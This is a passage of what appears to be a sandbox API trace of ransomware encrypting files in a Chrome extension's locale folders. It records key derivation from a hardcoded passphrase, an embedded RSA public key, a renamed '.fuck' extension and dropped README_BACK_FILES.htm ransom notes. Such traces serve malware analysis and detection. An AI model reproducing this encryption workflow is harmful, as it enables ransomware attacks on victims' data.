pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0251.796] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0251.796] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2989fb8) returned 1 [0251.796] CryptImportPublicKeyInfo (in: hCryptProv=0x2989fb8, dwCertEncodingType=0x1, pInfo=0x2991590*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29915c0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29915c8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29842a0) returned 1 [0251.796] CryptEncrypt (in: hKey=0x29842a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0251.797] CryptEncrypt (in: hKey=0x29842a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2989e20*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2989e20*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0251.797] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2989e20*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2989e20*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0251.798] ReadFile (in: hFile=0x5d64, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xb3, lpOverlapped=0x0) returned 1 [0251.799] CryptEncrypt (in: hKey=0x2984260, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0251.799] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0251.799] CloseHandle (hObject=0x5d64) returned 1 [0251.799] CloseHandle (hObject=0x5d5c) returned 1 [0251.799] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json"), bFailIfExists=0) returned 1 [0251.804] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json", dwFileAttributes=0x0) returned 1 [0251.804] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json.gsg")) returned 1 [0251.805] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json.fuck")) returned 1 [0251.807] CryptDestroyHash (hHash=0x29841a0) returned 1 [0251.807] CryptDestroyKey (hKey=0x2984260) returned 1 [0251.807] CryptReleaseContext (hProv=0x2989c88, dwFlags=0x0) returned 1 [0251.807] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0251.807] FindClose (in: hFindFile=0x2985a20 | out: hFindFile=0x2985a20) returned 1 [0251.807] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\readme_back_files.htm")) returned 0xffffffff [0251.807] AreFileApisANSI () returned 1 [0251.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 155 [0251.807] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0251.808] GetFileType (hFile=0x5d60) returned 0x1 [0251.808] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0251.809] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0251.809] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985a20 [0251.810] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0251.810] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0251.810] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0251.810] GetLastError () returned 0x0 [0251.810] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json")) returned 0x20 [0251.810] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json", dwFileAttributes=0x80) returned 1 [0251.811] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0251.811] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0251.813] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0251.813] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298a040) returned 1 [0251.815] CryptCreateHash (in: hProv=0x298a040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0251.815] lstrlenA (lpString="KbTPpdThroOLqoAPDACZIGRTzMlQm") returned 29 [0251.815] CryptHashData (hHash=0x2984020, pbData=0x28cb6e8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0251.816] CryptDeriveKey (in: hProv=0x298a040, Algid=0x6610, hBaseData=0x2984020, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984120) returned 1 [0251.816] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----b", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0251.816] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0251.816] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2989c88) returned 1 [0251.817] CryptImportPublicKeyInfo (in: hCryptProv=0x2989c88, dwCertEncodingType=0x1, pInfo=0x29918d0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2991900*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2991908*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2984460) returned 1 [0251.817] CryptEncrypt (in: hKey=0x2984460, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0251.817] CryptEncrypt (in: hKey=0x2984460, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298a508*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298a508*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0251.817] WriteFile (in: hFile=0x5d64, lpBuffer=0x298a508*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298a508*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0251.818] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xb3, lpOverlapped=0x0) returned 1 [0251.819] CryptEncrypt (in: hKey=0x2984120, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0251.819] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0251.820] CloseHandle (hObject=0x5d5c) returned 1 [0251.820] CloseHandle (hObject=0x5d64) returned 1 [0251.820] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json"), bFailIfExists=0) returned 1 [0251.823] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json", dwFileAttributes=0x0) returned 1 [0251.824] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json.gsg")) returned 1 [0251.825] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json.fuck")) returned 1 [0251.826] CryptDestroyHash (hHash=0x2984020) returned 1 [0251.826] CryptDestroyKey (hKey=0x2984120) returned 1 [0251.826] CryptReleaseContext (hProv=0x298a040, dwFlags=0x0) returned 1 [0251.826] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0251.826] FindClose (in: hFindFile=0x2985a20 | out: hFindFile=0x2985a20) returned 1 [0251.826] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\readme_back_files.htm")) returned 0xffffffff [0251.826] AreFileApisANSI () returned 1 [0251.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 155 [0251.826] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0251.827] GetFileType (hFile=0x5d60) returned 0x1 [0251.827] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0251.828] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0251.828] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985a20 [0251.829] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0251.829] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0251.829] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0251.829] GetLastError () returned 0x0 [0251.829] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json")) returned 0x20 [0251.830] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json", dwFileAttributes=0x80) returned 1 [0251.830] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0251.831] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0251.831] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0251.833] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298a040) returned 1 [0251.837] CryptCreateHash (in: hProv=0x298a040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0251.837] lstrlenA (lpString="KbTPpdThroOLqoAPDACZIGRTzMlQm") returned 29 [0251.837] CryptHashData (hHash=0x29846a0, pbData=0x28cb5d0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0251.837] CryptDeriveKey (in: hProv=0x298a040, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x29847a0) returned 1 [0251.837] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----b", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0251.837] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0251.837] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298ad00) returned 1 [0251.838] CryptImportPublicKeyInfo (in: hCryptProv=0x298ad00, dwCertEncodingType=0x1, pInfo=0x2992d20*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2992d50*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2992d58*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2984620) returned 1 [0251.839] CryptEncrypt (in: hKey=0x2984620, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0251.839] CryptEncrypt (in: hKey=0x2984620, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298ad88*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298ad88*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0251.840] WriteFile (in: hFile=0x5d5c, lpBuffer=0x298ad88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298ad88*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0251.841] ReadFile (in: hFile=0x5d64, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xb3, lpOverlapped=0x0) returned 1 [0251.843] CryptEncrypt (in: hKey=0x29847a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0251.843] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0251.843] CloseHandle (hObject=0x5d64) returned 1 [0251.844] CloseHandle (hObject=0x5d5c) returned 1 [0251.844] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json"), bFailIfExists=0) returned 1 [0251.848] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json", dwFileAttributes=0x0) returned 1 [0251.849] 